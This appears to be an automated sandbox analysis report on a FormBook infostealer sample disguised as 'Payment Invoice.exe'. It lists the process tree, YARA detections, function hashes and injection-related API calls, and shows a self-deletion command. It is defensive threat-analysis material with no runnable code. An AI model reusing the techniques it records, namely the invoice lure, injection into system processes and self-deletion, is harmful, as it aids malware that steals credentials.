Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Payment Invoice.exe PID: 6744 Parent PID: 6860

General

Start time:	14:39:51
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Imagebase:	0x140000
File size:	669184 bytes
MD5 hash:	EBFEAA73811B084FF7EC882503205988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000000.713411338.0000000000142000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Payment Invoice.exe PID: 6948 Parent PID: 6860

General

Start time:	14:39:51
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Imagebase:	0xc20000
File size:	669184 bytes
MD5 hash:	EBFEAA73811B084FF7EC882503205988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000000.715166926.0000000000C22000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.781781512.0000000000C22000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6948

General

Start time:	14:39:54
Start date:	12/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: autoconv.exe PID: 6752 Parent PID: 3424

General

Start time:	14:40:19
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xd00000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WWAHost.exe PID: 6992 Parent PID: 3424

General

Start time:	14:40:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WWAHost.exe
Imagebase:	0x240000
File size:	829856 bytes
MD5 hash:	370C260333EB3149EF4E49C8F64652A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.909529703.00000000007AA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.912797173.0000000003BEF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5904 Parent PID: 6992

General

Start time:	14:40:24
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6892 Parent PID: 5904

General

Start time:	14:40:25
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Payment Invoice.exe PID: 6860 Parent PID: 5812 Payment Invoice.exeCOMMON

Executed Functions

Function 00CE1BF1, Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

, xrefs: 00CE1E76

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 82d481d4ae07ff1478a9cf9647426a4d46934db4ebf93d064c419aac0ad1850b
Instruction ID: 270459414f33dfacaaa36a66cc5c51374cb21aba902f7196cf44dbeb1134cb82
Opcode Fuzzy Hash: 82d481d4ae07ff1478a9cf9647426a4d46934db4ebf93d064c419aac0ad1850b
Instruction Fuzzy Hash: 13A1F331F001598FCB14CFAAC8805AEB7B2FBC9311B198676DA15DB755D730EE618B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1768, Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

`$l, xrefs: 00CE17F5

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID: `$l
API String ID: 0-784925101
Opcode ID: 2430f40110280188d5ccd6958f6a6cca86fcb54512c962e683ad31d05a06cfe5
Instruction ID: 6ae0ef2c5c895b77bfbda67328222e5fb0cccaa3a55abac6baa70a2c21b5a08d
Opcode Fuzzy Hash: 2430f40110280188d5ccd6958f6a6cca86fcb54512c962e683ad31d05a06cfe5
Instruction Fuzzy Hash: 03816936F145148FD714DB6AD890BAEB3E3AFC8714F1A8174E819DBB65DB34AD018B80

Uniqueness

Uniqueness Score: -1.00%

Function 06E12F90, Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

`$l, xrefs: 06E1300D

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID: `$l
API String ID: 0-784925101
Opcode ID: b84e36b61cc8454ba00baebf35d5b7cf22a4615257157e8edf42db66001a7b0f
Instruction ID: fcf470684b6fb602accd187407a17fb1c32c5f00307aeca299c2be9adac6dcc5
Opcode Fuzzy Hash: b84e36b61cc8454ba00baebf35d5b7cf22a4615257157e8edf42db66001a7b0f
Instruction Fuzzy Hash: 2D814A32F101148FD754EB69DC90A9EB3E3AFC8714F1A8178E409DBB65EB75AC418B80

Uniqueness

Uniqueness Score: -1.00%

Function 06E18B10, Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

`$l, xrefs: 06E18B8D

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID: `$l
API String ID: 0-784925101
Opcode ID: 4008abd73c44969457d4caf91b5914f67a0628bf1ad2be6952b09c0934e9127d
Instruction ID: 583348f5efc46cd578ba22d4216ae35d86516169b6a759bab4c0af6d0120436a
Opcode Fuzzy Hash: 4008abd73c44969457d4caf91b5914f67a0628bf1ad2be6952b09c0934e9127d
Instruction Fuzzy Hash: C7817B72F102149FD754EB69DC90A9EB3E3AFC8714F1A8579E409DBB65DB34AC018B80

Uniqueness

Uniqueness Score: -1.00%

Function 06E17C7D, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

E, xrefs: 06E17C87

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: a5f20d4be2e7f0d204602ec0e6804c4227185ec2e0649301c3354d267ee06d58
Instruction ID: 280c9460fc2b43b8ce460547a6468b4af9c5c16a8898bef4c0abd420adbba62f
Opcode Fuzzy Hash: a5f20d4be2e7f0d204602ec0e6804c4227185ec2e0649301c3354d267ee06d58
Instruction Fuzzy Hash: 1981BF35A105198BDB04DF7AD844AAEB7F3BFC8309F11D658D446AF754DB34AA02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00CE0998, Relevance: .9, Instructions: 860COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d31b630280fbe77aa34ecd22c7a9d04f46cb2966d87c875d5916545e20db01
Instruction ID: 883b081eb6a213c8bff178db60afa74af6c5b5bd35fc815d98a57a94fbe13793
Opcode Fuzzy Hash: c6d31b630280fbe77aa34ecd22c7a9d04f46cb2966d87c875d5916545e20db01
Instruction Fuzzy Hash: 2372CF34E006698FCB14CFA9D980AADB7F2BF89304F28C569D455EB355DB34EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06E12098, Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc10d1b1a42d1a38c4245c94b848aa2a801b5ed44075c6d011860ed2e0db136
Instruction ID: b5cbaee77a2f36be06e263bbbe5368dc72bc1a92fb1b00938d91315023a48621
Opcode Fuzzy Hash: ddc10d1b1a42d1a38c4245c94b848aa2a801b5ed44075c6d011860ed2e0db136
Instruction Fuzzy Hash: AD626B71E102298FCB54CFA9D880AADB7F2FF88305F14C669D455AF749D734A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE09B2, Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcbacf53cfd1da117f391e376b04c536512ef39a98dd1f0b99880b933932c51
Instruction ID: 6a40f9c039b7c597f8247642b779b2451e2b709ddc67af4dea4ee9d82ba40caf
Opcode Fuzzy Hash: adcbacf53cfd1da117f391e376b04c536512ef39a98dd1f0b99880b933932c51
Instruction Fuzzy Hash: 8DD1AF35E006298FDB14CFBAD8807AEB7F2BFC8305F158569D415EB354DB30AA468B91

Uniqueness

Uniqueness Score: -1.00%

Function 06E12088, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3507c38a3646af67ff815462a6b29342ad67aa739298c8d636a202a1e156895c
Instruction ID: a99578d20aa05a93a8276dce8ef5e9bdcdc835a5ce2fe3d90d14fce40907ece9
Opcode Fuzzy Hash: 3507c38a3646af67ff815462a6b29342ad67aa739298c8d636a202a1e156895c
Instruction Fuzzy Hash: 00A1BE34A106198FDB04DF7AD8407AEB7F3BFC8305F14D569E406AB348DB34AA468B81

Uniqueness

Uniqueness Score: -1.00%

Function 06E120D2, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2804c666f54dbeb2d12c8a8b2ae99ab05b5297a5816dd0d9ad38d5f57df4c664
Instruction ID: 8e38c6d7e078ba574223efc2e7485597907b8724c4b3ffe55270affc3f26e8c1
Opcode Fuzzy Hash: 2804c666f54dbeb2d12c8a8b2ae99ab05b5297a5816dd0d9ad38d5f57df4c664
Instruction Fuzzy Hash: DD918D34A116198FDB04DF7AE8407AEB7F3FFC8305F149569D406AB348DB34AA468B81

Uniqueness

Uniqueness Score: -1.00%

Function 06E17C96, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0249f9fa4aa7b4611d21b0fb4d13364326a62349a7348fb2301f690a9ebb064
Instruction ID: 83c4ff115389bf8913ce010ce1a540b4d72dfcdf8d0f35f92916f1fc7bbfe212
Opcode Fuzzy Hash: d0249f9fa4aa7b4611d21b0fb4d13364326a62349a7348fb2301f690a9ebb064
Instruction Fuzzy Hash: DF919E35A1052A8FDB04CF7AD8446AEB7F3BFC8305F11D659D446EB354DB34A9028B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE0640, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d05755ff26e320d3186826b76bbb187112e5d983ea7fde1518ffaba17aafcf
Instruction ID: b7e74ab4cb6cfcb95035513a2cd9ecf3f2cc318079a896f23203728fba4818b0
Opcode Fuzzy Hash: d1d05755ff26e320d3186826b76bbb187112e5d983ea7fde1518ffaba17aafcf
Instruction Fuzzy Hash: C871FBB8E4011E9FDF14CFA6D484AAEB7F1FB48304F20A669D416EB254DB31AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1819, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9525f319e9bccf9109afd44a8ff81bf451e52bcefd2dde5a709d2b3ef9586e2
Instruction ID: 1803c3bbb4f565fef63a2e00a215f39cc77742fb6b2c9a5e574a5603630b2d80
Opcode Fuzzy Hash: f9525f319e9bccf9109afd44a8ff81bf451e52bcefd2dde5a709d2b3ef9586e2
Instruction Fuzzy Hash: 4F615B32F105248BD714DB69DC90BAEB3E3AFC4714F1A8174E4159BBA5DF34AD018B80

Uniqueness

Uniqueness Score: -1.00%

Function 06E18BB7, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762c29c254d43ab576f1909f7585bf6d65c9d6b011f52d10bd2bc2f4eb9e8757
Instruction ID: f9ead979fee334f10074ee2f12551193405e75ce22ee0200960610d3bc530c0a
Opcode Fuzzy Hash: 762c29c254d43ab576f1909f7585bf6d65c9d6b011f52d10bd2bc2f4eb9e8757
Instruction Fuzzy Hash: BF612872F116248FD754DB69DC90B9EB3E3AFC8614F1A8175E4059BB69DB34AC028B80

Uniqueness

Uniqueness Score: -1.00%

Function 00CEDF20, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00CEDF90
GetCurrentThread.KERNEL32 ref: 00CEDFCD
GetCurrentProcess.KERNEL32 ref: 00CEE00A
GetCurrentThreadId.KERNEL32 ref: 00CEE063

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b3cbf93d991b4ad3a984f78632371dff309dacabef4566d6527ae91077730b80
Instruction ID: 0bfdf98846d3f932229e16d266bcbaf9a2ed30f336e1756251cbccd96d94b85c
Opcode Fuzzy Hash: b3cbf93d991b4ad3a984f78632371dff309dacabef4566d6527ae91077730b80
Instruction Fuzzy Hash: E55176B49002498FDB10CFAAD588BDEBBF1FF89314F208459E419A7350D7745948CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00CEDF30, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00CEDF90
GetCurrentThread.KERNEL32 ref: 00CEDFCD
GetCurrentProcess.KERNEL32 ref: 00CEE00A
GetCurrentThreadId.KERNEL32 ref: 00CEE063

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e80d57a9a530bdfd6a89b18e2395aeb3a0f532f7f9d333c731e8e9b2c08c57ac
Instruction ID: e297c420df970536ca6b7d8acf6536db5fc4a2bc893fb37ce2a1bb14eea92830
Opcode Fuzzy Hash: e80d57a9a530bdfd6a89b18e2395aeb3a0f532f7f9d333c731e8e9b2c08c57ac
Instruction Fuzzy Hash: 9E5144B49002498FDB10CFAAD588B9EBBF1BF49314F208459E419A7250D7B46948CF66

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B8EC, Relevance: 1.8, APIs: 1, Instructions: 280processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E1BB2E

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 31a9954d0a0c8e1627f7086e6c14a79b1744d355fb6a7dad6dc126577c8712e3
Instruction ID: 852e56385f3b4ecc67e1c43e7ebcec70e0070ef5cb6ad43dfa22de450ab3ff72
Opcode Fuzzy Hash: 31a9954d0a0c8e1627f7086e6c14a79b1744d355fb6a7dad6dc126577c8712e3
Instruction Fuzzy Hash: 20B18C71D003198FDF54CFA8C881BEEBBB2BF48318F148569E859AB240DB749985DF91

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B8F8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E1BB2E

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e8f329e6fc9a4769bb64ea9e5120c9edb4ef84e4fe74fc04b49995e1a9d71fee
Instruction ID: d7fbf21e85e3f92c32aaee307cd685d506e2da838531d6536a2c49e834da500c
Opcode Fuzzy Hash: e8f329e6fc9a4769bb64ea9e5120c9edb4ef84e4fe74fc04b49995e1a9d71fee
Instruction Fuzzy Hash: 2B916A71D003198FDF54CF68C881BEEBBB2BF48318F048569E859AB284DB749985DF91

Uniqueness

Uniqueness Score: -1.00%

Function 06E1DA44, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06E1DB51

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: d8311106aaf6c5a8fc3d98f2db84565ff6433697206bd7194649a95bc91b7bd8
Instruction ID: 14d4a3d070f3e01966cf3ebf7a80324460545197d3abdc1c1a1cbddb97611359
Opcode Fuzzy Hash: d8311106aaf6c5a8fc3d98f2db84565ff6433697206bd7194649a95bc91b7bd8
Instruction Fuzzy Hash: 344152B4D003489FCB14CFA9D895BDEBBF1BF48318F148129E81AAB755C774A884CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06E1BE90, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 06E1DF18

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 02c83e7337ea78cfeb0890b42fa4b0fdab9fb9ecc1eeede1a95e2e4e512c6461
Instruction ID: c5c6eb140f87bc45d71de1e47a6b4db660b6d4b796d384a2abd79e83aed600dd
Opcode Fuzzy Hash: 02c83e7337ea78cfeb0890b42fa4b0fdab9fb9ecc1eeede1a95e2e4e512c6461
Instruction Fuzzy Hash: 1541A07180D3C68FC702DB68C8647DABFF1AF16214F19849BC090EB293D7789949DB62

Uniqueness

Uniqueness Score: -1.00%

Function 06E1DA50, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06E1DB51

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 6f8ec6b79eeedd4393efa06b31f0d44bce1a5b4fa2917dbfaeb349757bb50ab7
Instruction ID: a55891384a7dda9a011b5edabd9a5cb4c74879fbff3cf5d0de6625b37aedd244
Opcode Fuzzy Hash: 6f8ec6b79eeedd4393efa06b31f0d44bce1a5b4fa2917dbfaeb349757bb50ab7
Instruction Fuzzy Hash: DE4122B4D003489FDB14CFA9C894BDEBBF1BF48318F148129E81AAB354D774A845CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7BED, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CE7CA9

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2927e748606a3b2ed3bd2ccc92db14e9ff51ee1e2c8520f666103c133d7deb10
Instruction ID: 008cea792d8d724d544ca8c19a3034073284a5c69eb28dab9098cc20632b5dcd
Opcode Fuzzy Hash: 2927e748606a3b2ed3bd2ccc92db14e9ff51ee1e2c8520f666103c133d7deb10
Instruction Fuzzy Hash: 9F412271C04659CBDB24CFA9C8887DEBBF5BF49304F208169D508AB251EBB55946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6690, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CE7CA9

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 45b5fd6ce757dbf74bbd63d7e4ee5d29aff53373ef0795b0a8b1eeed62087a99
Instruction ID: 5f93f64689609aa3ba3f1991c28b36943a6b8a16b5f9216bfb4f1f9f37865f8c
Opcode Fuzzy Hash: 45b5fd6ce757dbf74bbd63d7e4ee5d29aff53373ef0795b0a8b1eeed62087a99
Instruction Fuzzy Hash: 49411471C0425DCBDB24CFAAC888BDEBBF5BF49304F208169D509AB251DBB56946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CEA62B, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 00CEA69D

Memory Dump Source

Source File: 00000001.00000002.719045927.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: fc71633fb9befa5b98bd7f575a9a599c104e1b409d2802b1d7c05ce387f8b10c
Instruction ID: 81074a0cbbb43e77b347d7b6e2747c8418a7c22b568d27e6f4b594e49228511b
Opcode Fuzzy Hash: fc71633fb9befa5b98bd7f575a9a599c104e1b409d2802b1d7c05ce387f8b10c
Instruction Fuzzy Hash: 843159719087C88FDB12CF76E8043EA7FF4EB06704F08449EE49497292C3789645DB61

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B749, Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E1B7E0

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 797988a88bee10be304c8989fef7f05407e55d3cbeb3045803bd7aaf03918aa8
Instruction ID: 35fb300b81bf73fa6c6dba09c6daafd3f4519abed50698f7e30d38440e70f4e0
Opcode Fuzzy Hash: 797988a88bee10be304c8989fef7f05407e55d3cbeb3045803bd7aaf03918aa8
Instruction Fuzzy Hash: CA215A769003499FCF10CFA9C885BEEBBF5FF48324F14842AE958A7640C7789944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E1ADF0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 06E1AE91

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d48064d3723fc7438913ac8d5a52c04b16dfe4c6c88e3a7640f9a9c5416f0758
Instruction ID: 836772c8c86cc4e2393cdc83e3b97850e7d5b02479f7733928f5d3cefc7490c3
Opcode Fuzzy Hash: d48064d3723fc7438913ac8d5a52c04b16dfe4c6c88e3a7640f9a9c5416f0758
Instruction Fuzzy Hash: A33139B1D013199FCB50CFA9D4847EEFBF5EF48320F14806AE858AB241D7749A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1ADF8, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 06E1AE91

Memory Dump Source

Source File: 00000001.00000002.730676720.0000000006E10000.00000040.00000001.sdmp, Offset: 06E10000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 08dfb30ae1f3733e8908eec7967712b180e517affadc730b5ede94d96c2eb592
Instruction ID: 707e050e56ca8e3eec9bfc6c3557a205023dbd6d094d225b420f600afda47ca7
Opcode Fuzzy Hash: 08dfb30ae1f3733e8908eec7967712b180e517affadc730b5ede94d96c2eb592
Instruction Fuzzy Hash: A9214BB1D013198FCB50CF99D4847EEFBF4EF48320F14806AE818AB241D7749A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06E1B750, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

